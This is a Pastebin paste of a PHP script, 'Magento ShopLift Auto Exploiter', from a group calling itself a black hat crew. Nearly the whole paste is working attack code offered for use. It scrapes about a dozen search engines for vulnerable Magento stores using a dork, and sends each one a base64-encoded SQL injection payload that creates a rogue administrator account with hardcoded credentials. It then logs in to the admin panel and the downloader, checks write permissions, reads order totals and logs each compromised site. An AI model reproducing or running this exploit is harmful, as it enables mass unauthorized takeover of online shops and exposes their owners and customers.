API tools faq
paste
Guest User

Untitled

a guest
Sep 17th, 2018
274
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.16 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /* ++++++++++++++++++++++++++++++++++
  3. ShopLift Exploiter Beta Version
  4. Author : FathurFreakz
  5. Use : php thisfile.php "Dork"
  6. YOGYAKARTA BLACK HAT
  7. Special Thanks to
  8. Nabiila Rizqi Khasanah
  9. +++++++++++++++++++++++++++++++++
  10. */
  11. error_reporting(0);
  12. set_time_limit(0);
  13. class ShopLiftFathurFreakz {
  14. private $dork = "";
  15. private $username = "FathurFreakz";
  16. private $password = "w0w1998";
  17.  
  18. public function Dork($dork){
  19. $this->dork = $dork;
  20. return $this->dork;
  21. }
  22.  
  23. private function CurlPost($url, $post = false){
  24. $ch = curl_init();
  25. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  26. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  27. curl_setopt($ch, CURLOPT_URL, $url);
  28. curl_setopt($ch, CURLOPT_HEADER, 0);
  29. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  30. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
  31. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  32. if($post !== false){
  33. $isi = '';
  34. foreach($post as $key=>$value){
  35. $isi .= $key.'='.$value.'&';
  36. }
  37. rtrim($isi, '&');
  38. curl_setopt($ch, CURLOPT_URL, $url);
  39. curl_setopt($ch, CURLOPT_POST, count($isi));
  40. curl_setopt($ch, CURLOPT_COOKIEJAR, 'pitek.txt');
  41. curl_setopt($ch, CURLOPT_POSTFIELDS, $isi);
  42. }
  43. $data = curl_exec($ch);
  44. curl_close($ch);
  45. return $data;
  46. }
  47.  
  48. private function GetStr($start,$end,$string){
  49. $a = explode($start,$string);
  50. $b = explode($end,$a[1]);
  51. return $b[0];
  52. }
  53.  
  54. private function LoginDownloader($url){
  55. $link = parse_url($url);
  56. $data = $this->CurlPost(sprintf("%s://%s/downloader/",$link["scheme"],$link["host"]),
  57. array("username" => $this->username,
  58. "password" => $this->password)
  59. );
  60. if(preg_match("/Log Out/i",$data) || (preg_match("/Return to Admin/i",$data))){
  61. $permission = (!preg_match("/Warning: Your Magento folder does not have sufficient write permissions./i",$data) ? "Writeable" : "Denied");
  62. return "Success\nPermission\t\t: ".$permission;
  63. } else {
  64. return "Failed";
  65. }
  66. }
  67.  
  68. private function LoginAdmin($target){
  69. $link = parse_url($target);
  70. $get = $this->CurlPost(sprintf("%s://%s/admin/",$link["scheme"],$link["host"]));
  71. $key = $this->GetStr("<input name=\"form_key\" type=\"hidden\" value=\"","\" />",$get);
  72. $data = $this->CurlPost(sprintf("%s://%s/admin/",$link["scheme"],$link["host"]),
  73. array("login[username]" => $this->username,
  74. "login[password]" => $this->password,
  75. "form_key" => $key)
  76. );
  77. return "Success\nOrder Total\t\t: ".$this->GetStr("<span class=\"price\">","</span>",$data);
  78.  
  79. }
  80.  
  81. private function ShopLiftExploit($target){
  82. $email = substr(md5(time()),2,15);
  83. $link = parse_url($target);
  84. $data = $this->CurlPost(sprintf("%s://%s/admin/Cms_Wysiwyg/directive/index/",$link["scheme"],$link["host"]),
  85. array("filter" => base64_encode("popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);SET @SALT = 'rp';SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{$this->password}') ), CONCAT(':', @SALT ));SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','{$email}@telekpitekwashere.cok','{$this->username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{$this->username}'),'Firstname');"),
  86. "___directive" => base64_encode("{{block type=Adminhtml/report_search_grid output=getCsvFile}}"),
  87. "forwarded" => "1")
  88. );
  89. return (@imagecreatefromstring($data) !== false);
  90. }
  91.  
  92. private function ExecuteExploit($victim){
  93. $file = fopen("ShopLift-".date("d-m-Y").".log","a");
  94. $url = parse_url($victim);
  95. $target = (!isset($url["scheme"]) ? "http://".$victim : $url["scheme"]."://".$url["host"]);
  96. if($this->ShopLiftExploit($target)){
  97. $downloader = $this->LoginDownloader($target);
  98. $admin = $this->LoginAdmin($target);
  99. $result = "\n============[ShopLift Result]============\nSite\t\t\t: {$target}\nLogin Admin\t\t: {$admin}\nLogin Downloader\t: {$downloader}\n===========================================\n";
  100. fwrite($file,$result);
  101. return $result;
  102. } else {
  103. return "[".date("H:i:s")."] ".$target." => Not vuln !\n";
  104. }
  105. fclose($file);
  106. }
  107.  
  108. public function SearchEngine($engine){
  109. $list = array();
  110. $ccbing = array("ca","br","be","nl","uk","it","es","de","no","dk","se","ch","ru","jp","cn","kr","mx","ar","cl","au");
  111. $ccgoogle = array("ae","com.af","com.ag","off.ai","am","com.ar","as","at","com.au","az","ba","com.bd","be","bg","bi","com.bo","com.br","bs","co.bw","com.bz","ca","cd","cg","ch","ci","co.ck","cl","com.co","co.cr","com.cu","de","dj","dk","dm","com.do","com.ec","es","com.et","fi","com.fj","fm","fr","gg","com.gi","gl","gm","gr","com.gt","com.hk","hn","hr","co.hu","co.id","ie","co.il","co.im","co.in","is","it","co.je","com.jm","jo","co.jp","co.ke","kg","co.kr","kz","li","lk","co.ls","lt","lu","lv","com.ly","mn","ms","com.mt","mu","mw","com.mx","com.my","com.na","com.nf","com.ni","nl","no","com.np","nr","nu","co.nz","com.om","com.pa","com.pe","com.ph","com.pk","pl","pn","com.pr","pt","com.py","ro","ru","rw","com.sa","com.sb","sc","se","com.sg","sh","sk","sn","sm","com.sv","co.th","com.tj","tm","to","tp","com.tr","tt","com.tw","com.ua","co.ug","co.uk","com.uy","uz","com.vc","co.ve","vg","co.vi","com.vn","vu","ws","co.za","co.zm");
  112. switch($engine){
  113. case 1:
  114. for($i=0;$i<=1000;$i+=10){
  115. $search = $this->CurlPost("http://www.bing.com/search?q=".urlencode($this->dork)."&first=".$i);
  116. preg_match_all('/<a href=\"?http:\/\/([^\"]*)\"/m', $search, $m);
  117. foreach($m[1] as $link){
  118. if(!preg_match("/live|msn|bing|microsoft/",$link)){
  119. if(!in_array($link,$list)){
  120. $list[] = $link;
  121. }
  122. }
  123. }
  124. echo "Catch [".count(array_unique($m[1]))."]\n";
  125. }
  126. echo "Total Bing : ".count($list)."\n";
  127. break;
  128. case 2:
  129. for($x=0;$x<=count($ccbing)-1;$x++){
  130. for($i=0;$i<=1000;$i+=10){
  131. $search = $this->CurlPost("http://www.bing.com/search?q=".urlencode($this->dork)."&cc=".$ccbing[$x]."&rf=1&first=".$i."&FORM=PORE");
  132. preg_match_all('/<a href=\"?http:\/\/([^\"]*)\"/m', $search, $m);
  133. foreach($m[1] as $link){
  134. if(!preg_match("/live|msn|bing|microsoft/",$link)){
  135. if(!in_array($link,$list)){
  136. $list[] = $link;
  137. }
  138. }
  139. }
  140. echo "Catch [".count(array_unique($m[1]))."]\n";
  141. }
  142. }
  143. echo "Total Bing World : ".count($list)."\n";
  144. break;
  145. case 3:
  146. for($x=0;$x<=count($ccgoogle)-1;$x++){
  147. for($i=0;$i<=200;$i+=10){
  148. $search = $this->CurlPost("http://www.google.".$ccgoogle[$x]."/search?num=50&q=".urlencode($this->dork)."&start=".$i."&sa=N");
  149. preg_match_all('/<a href=\"?http:\/\/([^>\"]*)\//m', $search, $m);
  150. foreach($m[1] as $link){
  151. if(!preg_match("/google/",$link)){
  152. if(!in_array($link,$list)){
  153. $list[] = $link;
  154. }
  155. }
  156. }
  157. echo "Catch [".count(array_unique($m[1]))."]\n";
  158. }
  159. }
  160. echo "Total Google World : ".count($list)."\n";
  161. break;
  162. case 4:
  163. for($x=0;$x<=count($ccbing)-1;$x++){
  164. for($i=1;$i<=1000;$i+=100){
  165. $search = $this->CurlPost("http://".$ccbing[$x].".ask.com/web?q=".urlencode($this->dork)."&qsrc=1&frstpgo=0&o=0&l=dir&qid=05D10861868F8C7817DAE9A6B4D30795&page=".$i."&jss=");
  166. preg_match_all('/href=\"http:\/\/(.*?)\" onmousedown=/m', $search, $m);
  167. foreach($m[1] as $link){
  168. if(!preg_match("/ask\.com/",$link)){
  169. if(!in_array($link,$list)){
  170. $list[] = $link;
  171. }
  172. }
  173. }
  174. echo "Catch [".count(array_unique($m[1]))."]\n";
  175. }
  176. }
  177. echo "Total Ask World : ".count($list)."\n";
  178. break;
  179. case 5:
  180. for($i=1;$i<=100;$i+=1){
  181. $search = $this->CurlPost("http://search.walla.co.il/?q=".urlencode($this->dork)."&type=text&page=".$i);
  182. preg_match_all('/<a href=\"http:\/\/(.+?)\" title=/m', $search, $m);
  183. foreach($m[1] as $link){
  184. if(!preg_match("/walla\.co\.il/",$link)){
  185. if(!in_array($link,$list)){
  186. $list[] = $link;
  187. }
  188. }
  189. }
  190. echo "Catch [".count(array_unique($m[1]))."]\n";
  191. }
  192. echo "Total Walla : ".count($list)."\n";
  193. break;
  194. case 6:
  195. for($i=1;$i<=400;$i+=10){
  196. $search = $this->CurlPost("http://szukaj.onet.pl/".$i.",query.html?qt=".urlencode($this->dork));
  197. preg_match_all('/<a href=\"http:\/\/(.*?)\">/m', $search, $m);
  198. foreach($m[1] as $link){
  199. if(!preg_match("/onet|webcache|query/",$link)){
  200. if(!in_array($link,$list)){
  201. $list[] = $link;
  202. }
  203. }
  204. }
  205. echo "Catch [".count(array_unique($m[1]))."]\n";
  206. }
  207. echo "Total Onet : ".count($list)."\n";
  208. break;
  209. case 7:
  210. for($i=1;$i<=50;$i+=1){
  211. $search = $this->CurlPost("http://pesquisa.sapo.pt/?barra=resumo&cluster=0&format=html&limit=10&location=pt&page=".$i."&q=".urlencode($this->dork)."&st=local");
  212. preg_match_all('/<a href=\"http:\/\/(.*?)\"/m', $search, $m);
  213. foreach($m[1] as $link){
  214. if(!preg_match("/\.sapo\.pt/",$link)){
  215. if(!in_array($link,$list)){
  216. $list[] = $link;
  217. }
  218. }
  219. }
  220. echo "Catch [".count(array_unique($m[1]))."]\n";
  221. }
  222. echo "Total Sapo : ".count($list)."\n";
  223. break;
  224. case 8:
  225. for($i=1;$i<=50;$i+=1){
  226. $search = $this->CurlPost("http://search.lycos.com/web?q=".urlencode($this->dork)."&pn=".$i);
  227. preg_match_all('/title=\"http:\/\/(.*?)\"/m', $search, $m);
  228. foreach($m[1] as $link){
  229. if(!preg_match("/lycos/",$link)){
  230. if(!in_array($link,$list)){
  231. $list[] = $link;
  232. }
  233. }
  234. }
  235. echo "Catch [".count(array_unique($m[1]))."]\n";
  236. }
  237. echo "Total Lycos : ".count($list)."\n";
  238. break;
  239. case 9:
  240. for($i=1;$i<=1000;$i+=10){
  241. $search = $this->CurlPost("http://busca.uol.com.br/web/?ref=homeuol&q=".urlencode($this->dork)."&start=".$i);
  242. preg_match_all('/href=\"?http:\/\/([^\">]*)\"/m', $search, $m);
  243. foreach($m[1] as $link){
  244. if(!preg_match("/uol\.com\.br|\/web/i",$link)){
  245. if(!in_array($link,$list)){
  246. $list[] = $link;
  247. }
  248. }
  249. }
  250. echo "Catch [".count(array_unique($m[1]))."]\n";
  251. }
  252. echo "Total Uol : ".count($list)."\n";
  253. break;
  254. case 10:
  255. for($i=1;$i<=300;$i+=20){
  256. $search = $this->CurlPost("http://search.seznam.cz/?q=".urlencode($this->dork)."&count=20&from=".$i);
  257. preg_match_all('/href=\"?http:\/\/([^\">]*)\"/m', $search, $m);
  258. foreach($m[1] as $link){
  259. if(!preg_match("/seznam\.cz|chytrevyhledavani\.cz|smobil\.cz|sklik\.cz/i",$link)){
  260. if(!in_array($link,$list)){
  261. $list[] = $link;
  262. }
  263. }
  264. }
  265. echo "Catch [".count(array_unique($m[1]))."]\n";
  266. }
  267. echo "Total Seznam : ".count($list)."\n";
  268. break;
  269. case 11:
  270. for($i=1;$i<=50;$i+=1){
  271. $search = $this->CurlPost("http://www.hotbot.com/search/web?pn=".$i."&q=".urlencode($this->dork));
  272. preg_match_all('/href=\"http:\/\/(.+?)\" title=/m', $search, $m);
  273. foreach($m[1] as $link){
  274. if(!preg_match("/hotbot\.com/",$link)){
  275. if(!in_array($link,$list)){
  276. $list[] = $link;
  277. }
  278. }
  279. }
  280. echo "Catch [".count(array_unique($m[1]))."]\n";
  281. }
  282. echo "Total Hotbot : ".count($list)."\n";
  283. break;
  284. case 12:
  285. for($i=1;$i<=300;$i+=10){
  286. $search = $this->CurlPost("http://search.aol.com/aol/search?q=".urlencode($this->dork)."&page=".$i);
  287. preg_match_all('/href=\"http:\/\/(.*?)\"/m', $search, $m);
  288. foreach($m[1] as $link){
  289. if(!preg_match("/aol\.com/",$link)){
  290. if(!in_array($link,$list)){
  291. $list[] = $link;
  292. }
  293. }
  294. }
  295. echo "Catch [".count(array_unique($m[1]))."]\n";
  296. }
  297. echo "Total Hotbot : ".count($list)."\n";
  298. break;
  299. }
  300. if(count($list)>0){
  301. echo "Exploiting target ".count($list).". Please wait ... \n";
  302. foreach($list as $do){
  303. echo $this->ExecuteExploit($do);
  304. }
  305. }
  306. }
  307.  
  308. public function ExploitLogo(){
  309. $logo = "==================================================\n";
  310. $logo .= "#\t Magento ShopLift Auto Exploiter \t #\n";
  311. $logo .= "#------------------------------------------------#\n";
  312. $logo .= "#\t Author \t: FathurFreakz \t\t #\n";
  313. $logo .= "#\t Email \t\t: fathurfreakz@gmail.com #\n";
  314. $logo .= "#\t Thanks to \t: Nabiila Rizqi K \t #\n";
  315. $logo .= "#\t Usage \t\t: php ".basename($_SERVER["SCRIPT_FILENAME"], '.php').".php \"Dork\"\t #\n";
  316. $logo .= "#------------------------------------------------#\n";
  317. $logo .= "#\t (C) ".date("Y")." YOGYAKARTA BLACK HAT \t\t #\n";
  318. $logo .= "==================================================\n";
  319. echo $logo;
  320. }
  321. }
  322. $Exploiter = new ShopLiftFathurFreakz();
  323. if(isset($argv[1]) && !empty($argv[1])){
  324. echo "Scanning target for dork : {$argv[1]}\n";
  325. $Exploiter->Dork($argv[1]);
  326. for($i=0;$i<13;$i++){
  327. $Exploiter->SearchEngine($i);
  328. flush();
  329. sleep(1);
  330. }
  331. echo "Scan finished !!!\n";
  332. flush();
  333. sleep(1);
  334. echo "Shuting down engine !!!\n";
  335. } else {
  336. $Exploiter->ExploitLogo();
  337. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!